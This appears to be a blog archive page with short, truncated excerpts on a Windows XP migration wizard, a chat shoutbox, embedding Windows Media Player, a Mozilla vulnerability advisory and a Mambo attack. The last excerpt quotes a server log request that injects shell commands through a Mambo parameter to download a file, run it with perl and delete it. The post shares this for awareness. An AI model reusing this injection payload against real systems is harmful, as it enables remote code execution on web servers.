File and Settings Transfer Wizard

As my staff and I were preparing to take the Microsoft Exam MS70-271, we came across a new Windows XP feature called the [File and Settings Transfer Wizard].  This is affectionately called ‘F.A.S.T.” (see Gary Woodruff article) This nifty wizard will allow us to migrate users’ files and settings from one computer to a new […]

Adding a shoutbox

We wanted to add more features to our eradioportal blog so we added a shoutbox. The shoutbox is like a chat box. The one we used was called wordspew by Jalenack. I think its cool that our visitors can now chat with fellow visitors to the site. What do you think? Please go to and […]

Adding Media Player to B*logs

I always wondered how other people were able to add windows media player and embed them into their blogs. Here is how: Play audio or video on your space The Microsoft Windows Media Player PowerToy enables your viewers to watch or listen to authorized personal media files you have linked to. You can customize […]

Multiple Mozilla Vulnerabilities

Overview Several vulnerabilities exist in the Mozilla web browser and derived products, the most serious of which could allow a remote attacker to execute arbitrary code on an affected system.Systems Affected Mozilla software, including the following, is affected: * Mozilla web browser, email and newsgroup client * Mozilla SeaMonkey * Firefox web browser * Thunderbird […]

Mambo Exploit Payload

My thanks to Mr Peter Abraham for bringing this attack payload to my attention: IP Address of attacker: 202.91.1XX.5 Sample log report including date and time stamp: Request: 202.91.1XX.5 – – [07/Feb/2006:00:00:24 -0600] “GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=;lwp-download%20;perl%20sess3023_;rm%20-rf%20sess3023*? Because this is something that was new to me, i asked Mr Abraham what the attack or exploit was. Looking at […]